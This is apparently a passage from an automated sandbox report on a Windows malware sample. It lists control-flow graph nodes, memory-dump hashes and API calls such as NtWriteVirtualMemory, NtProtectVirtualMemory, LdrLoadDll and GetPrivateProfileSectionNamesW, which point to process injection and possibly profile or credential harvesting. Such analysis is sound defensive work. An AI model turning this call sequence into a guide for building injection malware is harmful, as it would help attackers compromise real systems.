1895->1894 1897->1889 1912 22a1be1-22a1c20 1897->1912 1900->1900 1908 22a31ba-22a31c6 1900->1908 1904->1828 1908->1814 1909->1883 1911 229a847-229a8fa 1909->1911 1915 22a374d-22a3755 1911->1915 1916 229a900-229aac7 call 229f3ca call 22a2acd 1911->1916 1912->1889 1914 22a1c26-22a1c2a 1912->1914 1914->1861 1917 22a3756-22a378f 1915->1917 1926 229aacd-229afd9 call 229f3ee call 22a2acd call 229bd4b call 229f313 call 22a2acd 1916->1926 1927 229bbfe-229bd48 call 22a2acd * 3 1916->1927 1917->1917 1919 22a3791-22a37e0 1917->1919 1926->1927 1954 229afdf-229b089 1926->1954 1927->1741 1954->1741 1956 229b08f-229b1e5 call 22a2acd 1954->1956 1956->1883 1961 229b1eb-229b20b 1956->1961 1961->1927 1962 229b211-229b3f2 call 229b2fb 1961->1962 1962->1735 1968 229b3f8-229b554 call 22a2acd 1962->1968 1968->1927 1973 229b55a-229b597 1968->1973 1973->1927 1974 229b59d-229b604 1973->1974 1976 229b641-229b64a 1974->1976 1977 229b606-229b63b 1974->1977 1976->1836 1978 229b650-229b66e 1976->1978 1977->1927 1977->1976 1978->1927 1979 229b674-229b68f 1978->1979 1979->1836 1980 229b695-229b8b7 call 229f944 1979->1980 1980->1927 1986 229b8bd-229b9ea call 22a374d NtWriteVirtualMemory 1980->1986 1986->1927 1991 229b9f0-229baba call 22a2acd 1986->1991 1991->1927 1995 229bac0-229bb82 call 22a2acd 1991->1995 1995->1927 1999 229bb84-229bbde 1995->1999 1999->1915 2001 229bbe4-229bbfd call 22a2acd 1999->2001
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: EK]
                                                                                                                          • API String ID: 0-1532622298
                                                                                                                          • Opcode ID: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction ID: eb2cbd250763272bcd8cf8e7208af8028c3c0dfd6f943d0961196a5626680773
                                                                                                                          • Opcode Fuzzy Hash: a0cba0a81fb308cf4c3a5c258c041078d070c32af104d5bf65bead1deba37b65
                                                                                                                          • Instruction Fuzzy Hash: 8861BB7161034A9FDF359EB48AA43DB37A6EF9A3A0F55441ECC4ACFA01D7718986CB01
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2004 229ffed-229fff4 call 22a0391 2007 229fffa-22a008e 2004->2007 2009 22a0090-22a013c call 22a02dc 2007->2009 2013 22a013e-22a014a 2009->2013 2014 22a014c-22a01d8 2009->2014 2013->2014 2014->2009 2016 22a01de-22a01ea 2014->2016 2016->2007 2017 22a01f0-22a0231 2016->2017 2018 229f3ee-229f4b1 2017->2018 2019 22a0237-22a0243 2017->2019 2022 229f4b3-229f4e1 call 229fcc1 call 229f542 2018->2022 2023 229f4e4-229f53d LoadLibraryA call 229f542 2018->2023 2019->2007 2021 22a0249-22a0280 2019->2021 2021->2007 2024 22a0286-22a02d8 2021->2024 2022->2023
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: `
                                                                                                                          • API String ID: 0-1850852036
                                                                                                                          • Opcode ID: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction ID: ab16a663e764d3b5b77d7488a763370fffa0ceef89f64fd4858d85e8ca8b30dd
                                                                                                                          • Opcode Fuzzy Hash: 021217d6e82f315ae35b3563ff0eb4a17839efee1226da9567c98cd0f92d8134
                                                                                                                          • Instruction Fuzzy Hash: 0C519F7661075ACFCF745EA94E683DA33A3EFA13A0FDA402ACC4E9B504C7754A45CB41
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2153 22a23e2-22a24f9 NtProtectVirtualMemory
                                                                                                                          APIs
                                                                                                                          • NtProtectVirtualMemory.NTDLL(-11417B1E,?,?,?,?,022A15C1,12BC0BD0,0229A728), ref: 022A24F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProtectVirtual
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2706961497-0
                                                                                                                          • Opcode ID: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction ID: bb1b8697066ceadb776b78f72aee6ae3e4ba5e73982924afa458c612b805582e
                                                                                                                          • Opcode Fuzzy Hash: 1670dfe0295b295c956e32a55cfa435958ec75999ae85247dfb3362f5119314a
                                                                                                                          • Instruction Fuzzy Hash: 47017CB46143998FDF30CE68C8D87DA7695FB8D700F81412AAD4DAB305C6715E8ACB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2033 229bf1c-229bfcc call 229bf5c 2038 229f3ee-229f4b1 2033->2038 2039 229bfd2-229c025 call 229c88b call 229ebec 2033->2039 2043 229f4b3-229f4e1 call 229fcc1 call 229f542 2038->2043 2044 229f4e4-229f53d LoadLibraryA call 229f542 2038->2044 2054 229e546-229e553 call 229c02c 2039->2054 2043->2044 2059 229e51e-229e520 2054->2059 2060 229e555 2054->2060 2062 229e4bf-229e4c0 2059->2062 2063 229e522 2059->2063 2060->2038 2061 229e518 2060->2061 2061->2054 2064 229e4a2 2062->2064 2065 229e4c2-229e4c4 2062->2065 2063->2054 2068 229e4a9-229e4ae 2064->2068 2066 229e463 2065->2066 2067 229e4c6 2065->2067 2066->2068 2069 229e4f0-229e509 call 229c7b8 2067->2069 2068->2069 2069->2061
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction ID: 37d5f78019999084bcb4418b3882eed55cbc9909077be02d458d021af0fcdcc1
                                                                                                                          • Opcode Fuzzy Hash: 4dde117c9ab0f498474159960d817822d2740f54e3fa7f55f575a93b40af4ef9
                                                                                                                          • Instruction Fuzzy Hash: DA419A312243469FCF309EA849E03DB2262AF963B0F91431BCC69DB299D7718805C641
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2072 229be04-229bea8 call 229c88b 2077 229f3ee-229f4b1 2072->2077 2078 229beae-229c025 call 229bede call 229ebec 2072->2078 2082 229f4b3-229f4e1 call 229fcc1 call 229f542 2077->2082 2083 229f4e4-229f53d LoadLibraryA call 229f542 2077->2083 2095 229e546-229e553 call 229c02c 2078->2095 2082->2083 2099 229e51e-229e520 2095->2099 2100 229e555 2095->2100 2102 229e4bf-229e4c0 2099->2102 2103 229e522 2099->2103 2100->2077 2101 229e518 2100->2101 2101->2095 2104 229e4a2 2102->2104 2105 229e4c2-229e4c4 2102->2105 2103->2095 2108 229e4a9-229e4ae 2104->2108 2106 229e463 2105->2106 2107 229e4c6 2105->2107 2106->2108 2109 229e4f0-229e509 call 229c7b8 2107->2109 2108->2109 2109->2101
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction ID: 292291f4bb927259cb8b5658176dd009d981b48308af0990d109cd4c712adefc
                                                                                                                          • Opcode Fuzzy Hash: 72ba87792771cc4dd5f6310a94303021875a3260cf59806d4016084067a7ab69
                                                                                                                          • Instruction Fuzzy Hash: 3A31BD75620359DBCF309FB459A43EA336AAF857A0F92011FDC46DB644D7718D80CB42
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2112 229c02c-229c114 call 229c0b3 call 229c88b call 229ebec 2121 229c11a-229c11b 2112->2121 2122 229f3ee-229f4b1 2112->2122 2121->2122 2124 229f4b3-229f4e1 call 229fcc1 call 229f542 2122->2124 2125 229f4e4-229f53d LoadLibraryA call 229f542 2122->2125 2124->2125
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction ID: 9bd5ac7265987f9528bbeea21211f54dbab524748460cf85ec56f83096b7df04
                                                                                                                          • Opcode Fuzzy Hash: 32ec042b3a3ff8751d5e3830c917f679b5f0892ab36ffb89ee1e3e064fc07b13
                                                                                                                          • Instruction Fuzzy Hash: A8318A726103199BCF30AE694E943DE27B7AFD9790FAA801BDC09DB204D77189468A51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2133 229f3ee-229f4b1 2135 229f4b3-229f4e1 call 229fcc1 call 229f542 2133->2135 2136 229f4e4-229f53d LoadLibraryA call 229f542 2133->2136 2135->2136
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,4A82DAC6,022904DF,16EF18E8,0229E3FE,00000000,0229042E), ref: 0229F4E6
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1029625771-0
                                                                                                                          • Opcode ID: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction ID: 7ce17dad6ccd79c83be7301ccbc40aedb5d830660609e3c5e0a217bbc79fa59c
                                                                                                                          • Opcode Fuzzy Hash: 3ab1af08f2225e6075ab4171d93c1445c702b81fa469aa8eeef3256d0b180e45
                                                                                                                          • Instruction Fuzzy Hash: 7611667160132A9BCF30AFA95AA43CB337AAFC8790FA5801BDC49DB600D7718D41CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 2144 2293800-2293858 2147 229385e-2293876 call 2295ee3 2144->2147 2148 2293a62-229c1ca TerminateProcess 2144->2148
                                                                                                                          APIs
                                                                                                                          • TerminateProcess.KERNELBASE ref: 0229C1BE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, Offset: 02290000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2290000_c8ahotgz8h.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ProcessTerminate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 560597551-0
                                                                                                                          • Opcode ID: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
                                                                                                                          • Instruction ID: da2392900abf1338ace485c39df75b4200c675fc7f6a963f44f2862257977f40
                                                                                                                          • Opcode Fuzzy Hash: fef95deefe1bdea80e374594cdcf887aad249fa194f619d99be148cb413548ad
                                                                                                                          • Instruction Fuzzy Hash: 360142355A830A8BCF14AA3085823EDB7A0EE55360F964158CCD252019D32540CACF03
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:7.6%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:1.5%
                                                                                                                          Total number of Nodes:734
                                                                                                                          Total number of Limit Nodes:24

                                                                                                                          Graph

                                                                                                                          execution_graph 5137 1bf400015e0 5138 1bf400015e3 5137->5138 5143 1bf40001492 5138->5143 5140 1bf40001698 5147 1bf400024d2 5140->5147 5144 1bf400014be 5143->5144 5151 1bf40000b72 5144->5151 5146 1bf400014cb 5146->5140 5148 1bf4000250d 5147->5148 5150 1bf40002081 5147->5150 5149 1bf40005412 LdrLoadDll 5148->5149 5149->5150 5152 1bf40000be4 5151->5152 5153 1bf400034e2 LdrLoadDll 5152->5153 5154 1bf40000c18 5153->5154 5155 1bf40005412 LdrLoadDll 5154->5155 5156 1bf40000c35 5155->5156 5156->5146 4801 1bf40006762 4802 1bf4000676b 4801->4802 4803 1bf40006770 4802->4803 4807 1bf4000677c 4802->4807 4895 1bf40003f12 4803->4895 4805 1bf40006775 4806 1bf400068fa 4807->4806 4829 1bf400020a2 4807->4829 4809 1bf400067dc 4809->4806 4833 1bf3fffe362 4809->4833 4812 1bf4000680d 4929 1bf400048a2 4812->4929 4814 1bf4000681a 4815 1bf40006815 4814->4815 4950 1bf3fffd4b2 4814->4950 4815->4806 4871 1bf40000812 4815->4871 4817 1bf40006835 4818 1bf400048a2 LdrLoadDll 4817->4818 4819 1bf4000683d 4818->4819 4821 1bf40006894 4819->4821 4826 1bf4000685f 4819->4826 4970 1bf3fffd372 4821->4970 4824 1bf400068f6 ExitProcess 4966 1bf400034e2 4826->4966 4828 1bf40006872 4830 1bf400020d8 4829->4830 4831 1bf40005412 LdrLoadDll 4830->4831 4832 1bf40002167 4831->4832 4832->4809 4835 1bf3fffe394 4833->4835 4834 1bf3fffe843 4834->4806 4834->4812 4834->4814 4834->4815 4835->4834 4836 1bf400034e2 LdrLoadDll 4835->4836 4837 1bf3fffe4b3 4836->4837 4838 1bf40005412 LdrLoadDll 4837->4838 4839 1bf3fffe4d7 4838->4839 4840 1bf40005412 LdrLoadDll 4839->4840 4841 1bf3fffe4ff 4840->4841 4841->4834 4842 1bf40005412 LdrLoadDll 4841->4842 4843 1bf3fffe54a 4842->4843 4843->4834 4844 1bf400034e2 LdrLoadDll 4843->4844 4845 1bf3fffe5a1 4844->4845 4846 1bf400034e2 LdrLoadDll 4845->4846 4847 1bf3fffe5b9 4846->4847 4848 1bf40005412 LdrLoadDll 4847->4848 4849 1bf3fffe5e6 4848->4849 4850 1bf40005412 LdrLoadDll 4849->4850 4851 1bf3fffe613 4850->4851 4851->4834 4852 1bf40005412 LdrLoadDll 4851->4852 4853 1bf3fffe64e 4852->4853 4973 1bf40006992 4853->4973 4855 1bf3fffe662 4855->4834 4979 1bf40003672 4855->4979 4857 1bf3fffe713 4858 1bf40005412 LdrLoadDll 4857->4858 4859 1bf3fffe76e 4858->4859 4860 1bf40005412 LdrLoadDll 4859->4860 4861 1bf3fffe792 4860->4861 4862 1bf40005412 LdrLoadDll 4861->4862 4863 1bf3fffe7b6 4862->4863 4864 1bf40005412 LdrLoadDll 4863->4864 4865 1bf3fffe7da 4864->4865 4866 1bf40005412 LdrLoadDll 4865->4866 4867 1bf3fffe7fe 4866->4867 4868 1bf40005412 LdrLoadDll 4867->4868 4869 1bf3fffe82f 4868->4869 4870 1bf40006992 LdrLoadDll 4869->4870 4870->4834 4872 1bf40006992 LdrLoadDll 4871->4872 4873 1bf400008c7 4872->4873 4874 1bf40006992 LdrLoadDll 4873->4874 4875 1bf400008db 4874->4875 4876 1bf40000a6f 4875->4876 4877 1bf400034e2 LdrLoadDll 4875->4877 4890 1bf40005412 4876->4890 4878 1bf4000091f 4877->4878 4983 1bf40000302 4878->4983 4880 1bf40000940 4880->4876 4881 1bf400034e2 LdrLoadDll 4880->4881 4882 1bf400009cf 4881->4882 4882->4876 4883 1bf40005412 LdrLoadDll 4882->4883 4884 1bf400009f1 4883->4884 4884->4876 5010 1bf400004b2 4884->5010 4889 1bf40004c42 LdrLoadDll 4889->4876 4891 1bf4000562b 4890->4891 4893 1bf40005437 4890->4893 4891->4824 4892 1bf4000544e 4892->4824 4893->4892 5080 1bf40005982 4893->5080 4896 1bf40003f3b 4895->4896 4897 1bf400020a2 LdrLoadDll 4896->4897 4898 1bf40003f44 4897->4898 4899 1bf40005412 LdrLoadDll 4898->4899 4927 1bf40004422 4898->4927 4900 1bf40003fe5 4899->4900 4901 1bf40005412 LdrLoadDll 4900->4901 4902 1bf4000400d 4901->4902 4903 1bf40005412 LdrLoadDll 4902->4903 4902->4927 4904 1bf40004052 4903->4904 4905 1bf40005412 LdrLoadDll 4904->4905 4907 1bf400040af 4905->4907 4906 1bf400040bf 4906->4805 4907->4906 4908 1bf40005412 LdrLoadDll 4907->4908 4909 1bf40004132 4908->4909 4909->4906 4910 1bf40004160 4909->4910 4911 1bf400041ab 4909->4911 5098 1bf40003cb2 4910->5098 4912 1bf40005412 LdrLoadDll 4911->4912 4913 1bf400041cc 4912->4913 4916 1bf400041dd 4913->4916 4917 1bf40005412 LdrLoadDll 4913->4917 4916->4805 4918 1bf4000422a 4917->4918 4919 1bf40005412 LdrLoadDll 4918->4919 4920 1bf4000425a 4919->4920 4921 1bf40004335 4920->4921 4924 1bf400042e2 4920->4924 5110 1bf3fffeb22 4920->5110 5118 1bf40003a82 4921->5118 4925 1bf40005412 LdrLoadDll 4924->4925 4928 1bf40004376 4924->4928 4925->4928 4926 1bf40005412 LdrLoadDll 4926->4927 4927->4805 4928->4926 4930 1bf400048cf 4929->4930 4931 1bf40004c2c 4930->4931 4932 1bf40005412 LdrLoadDll 4930->4932 4931->4815 4933 1bf4000492d 4932->4933 4934 1bf40005412 LdrLoadDll 4933->4934 4935 1bf4000495e 4934->4935 4936 1bf40005412 LdrLoadDll 4935->4936 4938 1bf4000498f 4936->4938 4937 1bf40004beb 4937->4815 4938->4937 5130 1bf400037c2 4938->5130 4940 1bf40004af5 5134 1bf40004742 4940->5134 4942 1bf40004b11 4942->4937 4943 1bf40005412 LdrLoadDll 4942->4943 4944 1bf40004b60 4943->4944 4945 1bf40005412 LdrLoadDll 4944->4945 4946 1bf40004b8d 4945->4946 4947 1bf40005412 LdrLoadDll 4946->4947 4948 1bf40004bbc 4947->4948 4949 1bf40005412 LdrLoadDll 4948->4949 4949->4937 4951 1bf3fffd4b3 4950->4951 4952 1bf400034e2 LdrLoadDll 4951->4952 4953 1bf3fffd53a 4952->4953 4954 1bf400034e2 LdrLoadDll 4953->4954 4965 1bf3fffd61b 4953->4965 4955 1bf3fffd55e 4954->4955 4956 1bf40005412 LdrLoadDll 4955->4956 4955->4965 4957 1bf3fffd587 4956->4957 4958 1bf40005412 LdrLoadDll 4957->4958 4959 1bf3fffd5ab 4958->4959 4960 1bf40005412 LdrLoadDll 4959->4960 4961 1bf3fffd5cf 4960->4961 4962 1bf40005412 LdrLoadDll 4961->4962 4963 1bf3fffd5f7 4962->4963 4964 1bf40005412 LdrLoadDll 4963->4964 4964->4965 4965->4817 4967 1bf4000350a 4966->4967 4968 1bf4000350e 4967->4968 4969 1bf4000354a LdrLoadDll 4967->4969 4968->4828 4969->4968 4971 1bf3fffd3a0 4970->4971 4972 1bf40005412 LdrLoadDll 4970->4972 4971->4815 4972->4971 4974 1bf400069b3 4973->4974 4978 1bf400069a6 4973->4978 4975 1bf40005412 LdrLoadDll 4974->4975 4976 1bf400069c9 4975->4976 4977 1bf40005412 LdrLoadDll 4976->4977 4976->4978 4977->4978 4978->4855 4980 1bf400036a6 4979->4980 4981 1bf40005412 LdrLoadDll 4980->4981 4982 1bf400036ee 4981->4982 4982->4857 4984 1bf40000496 4983->4984 4985 1bf4000031b 4983->4985 4984->4880 4985->4984 4986 1bf40005412 LdrLoadDll 4985->4986 4987 1bf40000343 4986->4987 4988 1bf40005412 LdrLoadDll 4987->4988 4989 1bf40000360 4988->4989 4990 1bf40005412 LdrLoadDll 4989->4990 4991 1bf4000037d 4990->4991 4992 1bf40005412 LdrLoadDll 4991->4992 4993 1bf4000039a 4992->4993 4994 1bf40005412 LdrLoadDll 4993->4994 4995 1bf400003b7 4994->4995 4996 1bf40005412 LdrLoadDll 4995->4996 4997 1bf400003d4 4996->4997 4998 1bf40005412 LdrLoadDll 4997->4998 4999 1bf400003f1 4998->4999 5000 1bf40005412 LdrLoadDll 4999->5000 5001 1bf4000040e 5000->5001 5002 1bf40005412 LdrLoadDll 5001->5002 5003 1bf4000042b 5002->5003 5004 1bf40005412 LdrLoadDll 5003->5004 5005 1bf40000448 5004->5005 5006 1bf40005412 LdrLoadDll 5005->5006 5007 1bf40000465 5006->5007 5008 1bf40005412 LdrLoadDll 5007->5008 5009 1bf40000482 5008->5009 5009->4880 5011 1bf40003672 LdrLoadDll 5010->5011 5012 1bf400005a9 5011->5012 5013 1bf40005412 LdrLoadDll 5012->5013 5014 1bf4000065b 5013->5014 5015 1bf40005412 LdrLoadDll 5014->5015 5016 1bf40000681 5015->5016 5017 1bf400007f2 5016->5017 5018 1bf400006a0 GetPrivateProfileSectionNamesW 5016->5018 5023 1bf40004c42 5017->5023 5019 1bf400006bd 5018->5019 5029 1bf3ffffb22 5019->5029 5021 1bf400006dd 5021->5017 5033 1bf3fffff62 5021->5033 5024 1bf40004c5c 5023->5024 5025 1bf40005412 LdrLoadDll 5024->5025 5028 1bf40000a60 5024->5028 5026 1bf40004c87 5025->5026 5027 1bf40005412 LdrLoadDll 5026->5027 5027->5028 5028->4889 5030 1bf3ffffb73 5029->5030 5032 1bf3ffffcda 5030->5032 5042 1bf40004d02 5030->5042 5032->5021 5034 1bf3fffffb0 5033->5034 5035 1bf40004d02 2 API calls 5034->5035 5039 1bf400000dc 5035->5039 5036 1bf400002e2 5036->5021 5037 1bf400002c3 5038 1bf40004c42 LdrLoadDll 5037->5038 5038->5036 5039->5036 5039->5037 5040 1bf3ffffb22 LdrLoadDll NtCreateFile 5039->5040 5041 1bf3ffffdd2 LdrLoadDll NtCreateFile 5039->5041 5040->5039 5041->5039 5043 1bf4000538d 5042->5043 5044 1bf40004d2c 5042->5044 5043->5032 5044->5043 5045 1bf40004dc0 5044->5045 5046 1bf40005412 LdrLoadDll 5044->5046 5047 1bf40004e71 5045->5047 5048 1bf40004e04 5045->5048 5070 1bf40004e2f 5045->5070 5046->5045 5049 1bf40004e99 5047->5049 5051 1bf40005412 LdrLoadDll 5047->5051 5050 1bf40005412 LdrLoadDll 5048->5050 5048->5070 5052 1bf40004ee0 NtCreateFile 5049->5052 5053 1bf40005412 LdrLoadDll 5049->5053 5049->5070 5050->5070 5051->5049 5054 1bf40004c42 LdrLoadDll 5052->5054 5055 1bf40004ed0 5053->5055 5056 1bf40004f2d 5054->5056 5055->5052 5055->5070 5057 1bf40005412 LdrLoadDll 5056->5057 5058 1bf40004f7e 5056->5058 5056->5070 5057->5058 5059 1bf40004fd0 5058->5059 5060 1bf4000502e 5058->5060 5058->5070 5063 1bf40005412 LdrLoadDll 5059->5063 5059->5070 5061 1bf400050e6 5060->5061 5062 1bf40005037 5060->5062 5064 1bf400050ef 5061->5064 5065 1bf40005188 5061->5065 5069 1bf40005412 LdrLoadDll 5062->5069 5062->5070 5063->5070 5068 1bf40005117 5064->5068 5071 1bf40005412 LdrLoadDll 5064->5071 5066 1bf40005209 5065->5066 5067 1bf4000518d 5065->5067 5072 1bf40005212 5066->5072 5073 1bf40005294 5066->5073 5067->5070 5075 1bf40005412 LdrLoadDll 5067->5075 5068->5070 5074 1bf40006992 LdrLoadDll 5068->5074 5069->5070 5070->5032 5071->5068 5072->5070 5077 1bf40005412 LdrLoadDll 5072->5077 5073->5070 5076 1bf400052c5 5073->5076 5078 1bf40005412 LdrLoadDll 5073->5078 5074->5070 5075->5070 5076->5070 5079 1bf40005412 LdrLoadDll 5076->5079 5077->5070 5078->5076 5079->5070 5082 1bf40005997 5080->5082 5085 1bf40005642 5080->5085 5083 1bf40005412 LdrLoadDll 5082->5083 5084 1bf40005a11 5082->5084 5083->5084 5084->4892 5086 1bf40005674 5085->5086 5087 1bf400056e2 5086->5087 5088 1bf400034e2 LdrLoadDll 5086->5088 5087->5082 5089 1bf4000571d 5088->5089 5089->5087 5092 1bf40005783 5089->5092 5094 1bf40006a32 5089->5094 5090 1bf40005801 5090->5082 5092->5090 5093 1bf40005982 LdrLoadDll 5092->5093 5093->5090 5095 1bf40006a5d 5094->5095 5096 1bf40006a47 5094->5096 5095->5092 5097 1bf40005412 LdrLoadDll 5096->5097 5097->5095 5099 1bf40003cfe 5098->5099 5100 1bf40005412 LdrLoadDll 5099->5100 5109 1bf40003e56 5099->5109 5101 1bf40003d6f 5100->5101 5102 1bf40003a82 LdrLoadDll 5101->5102 5101->5109 5103 1bf40003d92 5102->5103 5104 1bf40005412 LdrLoadDll 5103->5104 5103->5109 5105 1bf40003e29 5104->5105 5106 1bf40005412 LdrLoadDll 5105->5106 5105->5109 5107 1bf40003e7c 5106->5107 5108 1bf40005412 LdrLoadDll 5107->5108 5107->5109 5108->5109 5109->4805 5112 1bf3fffeb3e 5110->5112 5111 1bf3fffec69 5111->4921 5112->5111 5126 1bf3fffe9c2 5112->5126 5114 1bf3fffec3f 5114->5111 5115 1bf3fffe9c2 LdrLoadDll 5114->5115 5116 1bf3fffec54 5115->5116 5116->5111 5117 1bf3fffe9c2 LdrLoadDll 5116->5117 5117->5111 5119 1bf40003ac7 5118->5119 5119->5119 5120 1bf40005412 LdrLoadDll 5119->5120 5121 1bf40003b0d 5120->5121 5122 1bf40005412 LdrLoadDll 5121->5122 5123 1bf40003b36 5122->5123 5124 1bf40005412 LdrLoadDll 5123->5124 5125 1bf40003b91 5123->5125 5124->5125 5125->4924 5127 1bf3fffea1c 5126->5127 5128 1bf40005412 LdrLoadDll 5127->5128 5129 1bf3fffea35 5128->5129 5129->5114 5131 1bf4000380d 5130->5131 5132 1bf40005412 LdrLoadDll 5131->5132 5133 1bf40003900 5132->5133 5133->4940 5135 1bf40003672 LdrLoadDll 5134->5135 5136 1bf400047ba 5134->5136 5135->5136 5136->4942 5157 1bf400074e3 5158 1bf400074ed 5157->5158 5161 1bf3fffdf72 5158->5161 5160 1bf40007510 5162 1bf3fffdf91 5161->5162 5165 1bf3fffdfaa 5161->5165 5166 1bf3fffd0f2 5162->5166 5165->5160 5167 1bf3fffd109 5166->5167 5171 1bf3fffd1af 5166->5171 5172 1bf3fffd012 5167->5172 5169 1bf3fffd118 5176 1bf40005a52 5169->5176 5171->5160 5174 1bf3fffd031 5172->5174 5173 1bf3fffd0cd 5173->5169 5174->5173 5175 1bf40005a52 LdrLoadDll 5174->5175 5175->5173 5177 1bf40005a85 5176->5177 5178 1bf40005b4e 5177->5178 5189 1bf40005aef 5177->5189 5193 1bf40002452 5177->5193 5181 1bf40005412 LdrLoadDll 5178->5181 5183 1bf40005baa 5178->5183 5178->5189 5180 1bf40005c51 5191 1bf40005c8d 5180->5191 5201 1bf400025d2 5180->5201 5181->5183 